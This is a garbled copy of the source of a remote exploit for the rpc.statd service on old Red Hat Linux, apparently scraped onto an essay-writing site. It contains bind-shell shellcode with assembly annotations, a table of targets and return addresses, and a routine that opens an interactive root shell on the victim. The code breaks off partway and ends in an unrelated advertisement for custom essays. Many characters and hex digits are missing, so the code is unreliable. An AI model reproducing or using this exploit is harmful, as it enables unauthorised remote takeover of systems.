x8xc / movl %eax,%ebx /


xfexc0 / incb %al /


x8x01 / movl %eax,(%ecx) /


xb0x66 / movb $0x66,%al /


xcdx80 / int $0x80 /


/ ------------------------------------ bind(sd,&sockaddr,16); -------- /


xbx0 / movb $0x,%bl /


x8x5x0c / movl %ebx,0xc(%ecx) /


xc6x41x0ex / movb $0x,0xe(%ecx) /


xc6x41x08x10 / movb $0x10,0x8(%ecx) /


x8x4x04 / movl %ecx,0x4(%ecx) /


x80x41x04x0c / addb $0xc,0x4(%ecx) /


x88x01 / movb %al,(%ecx) /


xb0x66 / movb $0x66,%al /


xcdx80 / int $0x80 /


/ ------------------------------------ listen(sd,blah); -------------- /


xbx04 / movb $0x4,%bl /


xb0x66 / movb $0x66,%al /


xcdx80 / int $0x80 /


/ ------------------------------------ accept(sd,0,16); -------------- /


xbx05 / movb $0x5,%bl /


x0xc0 / xorb %al,%al /


x88x41x04 / movb %al,0x4(%ecx) /


xb0x66 / movb $0x66,%al /


xcdx80 / int $0x80 /


/ ------------------------------------ dup(cd,0); ------------------- /


x8xce / movl %ecx,%esi /


x88xc / movb %al,%bl /


x1xc / xorl %ecx,%ecx /


xb0xf / movb $0xf,%al /


xcdx80 / int $0x80 /


/ ------------------------------------ dup(cd,1); ------------------- /


xfexc1 / incb %cl /


xb0xf / movb $0xf,%al /


xcdx80 / int $0x80 /


/ ------------------------------------ dup(cd,); ------------------- /


xfexc1 / incb %cl /


xb0xf / movb $0xf,%al /


xcdx80 / int $0x80 /


/ ------------------------------------ execve(/bin/sh,argv,0); ----- /


xc7x06xfx6x6x6e / movl $0x6e66f,(%esi) /


xc7x46x04xfx7x68x41 / movl $0x41687f,0x4(%esi) /


x0xc0 / xorb %al,%al /


x88x46x07 / movb %al,0x7(%esi) /


x8x76x0c / movl %esi,0xc(%esi) /


x8dx56x10 / leal 0x10(%esi),%edx /


x8dx4ex0c / leal 0xc(%esi),%ecx /


x8xf / movl %esi,%ebx /


xb0x0b / movb $0xb,%al /


xcdx80 / int $0x80 /


/ ------------------------------------ exit(blah); ------------------- /


xb0x01 / movb $0x1,%al /


xcdx80 / int $0x80 /


/ ricochet call kungfu ---------------------------------------------- /


xe8x7fxffxffxff; / call -0x81 /


enum res


{


stat_succ,


stat_fail


};


struct sm_name


{


char mon_name;


};


struct sm_stat_res


{


enum res res_stat;


int state;


};


struct type


{


int type;


char desc;


char code;


u_long bufpos;


int buflen;


int offset;


int wipe;


};


struct type types[] =


{


{0, Redhat 6. (nfs-utils-0.1.6-), shellcode, 0xbffff14, 104, 600,


},


{1, Redhat 6.1 (knfsd-1.4.7-7), shellcode, 0xbffff14, 104, 600, },


{, Redhat 6.0 (knfsd-1..-4), shellcode, 0xbffff14, 104, 600, },


{0, NULL, NULL, 0, 0, 0, 0}


};


bool_t


xdr_sm_name(XDR xdrs, struct sm_name objp)


{


if (!xdr_string(xdrs, &objp-mon_name, SM_MAXSTRLEN))


return (FALSE);


return (TRUE);


}


bool_t


xdr_res(XDR xdrs, enum res objp)


{


if (!xdr_enum(xdrs, (enum_t )objp))


return (FALSE);


return (TRUE);


}


bool_t


xdr_sm_stat_res(XDR xdrs, struct sm_stat_res objp)


{


if (!xdr_res(xdrs, &objp-res_stat))


return (FALSE);


if (!xdr_int(xdrs, &objp-state))


return (FALSE);


return (TRUE);


}


void


usage(char app)


{


int i;


fprintf(stderr, statdx by ron1n shellcode@hotmail.com );


fprintf(stderr, Usage %s [-t] [-p port] [-a addr] [-l len] , app);


fprintf(stderr, [-o offset] [-w num] [-s secs] [-d type]


target );


fprintf(stderr, -t attack a tcp dispatcher [udp] );


fprintf(stderr, -p rpc.statd serves requests on port [query] );


fprintf(stderr, -a the stack address of the buffer is addr );


fprintf(stderr, -l the length of the buffer is len [104] );


fprintf(stderr, -o the offset to return to is offset [600] );


fprintf(stderr, -w the number of dwords to wipe is num [] );


fprintf(stderr, -s set timeout in seconds to secs [5] );


fprintf(stderr, -d use a hardcoded type );


fprintf(stderr, Available types );


for(i = 0; types[i].desc; i++)


fprintf(stderr, %d %s , types[i].type, types[i].desc);


exit(EXIT_FAILURE);


}


void


runshell(int sockd)


{


char buff[104];


int fmax, ret;


fd_set fds;


fmax = max(fileno(stdin), sockd) + 1;


send(sockd, cd /; ls -alF; id; , 1, 0);


for(;;)


{


FD_ZERO(&fds);


FD_SET(fileno(stdin), &fds);


FD_SET(sockd, &fds);


if(select(fmax, &fds, NULL, NULL, NULL) 0)


{


perror(select());


exit(EXIT_FAILURE);


}


if(FD_ISSET(sockd, &fds))


{


bzero(buff, sizeof buff);


if((ret = recv(sockd, buff, sizeof buff, 0)) 0)


{


perror(recv());


exit(EXIT_FAILURE);


}


if(!ret)


{


fprintf(stderr, Connection closed );


exit(EXIT_FAILURE);


}


write(fileno(stdout), buff, ret);


}


if(FD_ISSET(fileno(stdin), &fds))


{


bzero(buff, sizeof buff);


ret = read(fileno(stdin), buff, sizeof buff);


errno = 0;


if(send(sockd, buff, ret, 0) != ret)


{


if(errno) perror(send());


else fprintf(stderr, Transmission loss );


exit(EXIT_FAILURE);


}


}


}


}


void


connection(struct sockaddr_in host)


{


int sockd;


host.sin_port = htons(168);


if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) 0)


{


perror(socket());


exit(EXIT_FAILURE);


}


if(!connect(sockd, (struct sockaddr ) &host, sizeof host))


{


printf(OMG! You now have rpc.statd technique!@#$! );


runshell(sockd);


}


close(sockd);


}


char


wizardry(char sc, u_long bufpos, int buflen, int offset, int wipe)


{


int i, j, cnt, pad;


char pbyte, buff, ptr;


u_long retpos;


u_long dstpos;


while(bufpos % 4) bufpos--;


/ buflen + ebp /


retpos = bufpos + buflen + 4;


/


0x00 ==


Please note that this sample paper on Hacking into Linux is for your review only. In order to eliminate any of the plagiarism issues, it is highly recommended that you do not use it for you own writing purposes. In case you experience difficulties with writing a well structured and accurately composed paper on Hacking into Linux, we are here to assist you. Your persuasive essay on Hacking into Linux will be written from scratch, so you do not have to worry about its originality. Order your authentic assignment and you will be amazed at how easy it is to complete a quality custom paper within the shortest time possible!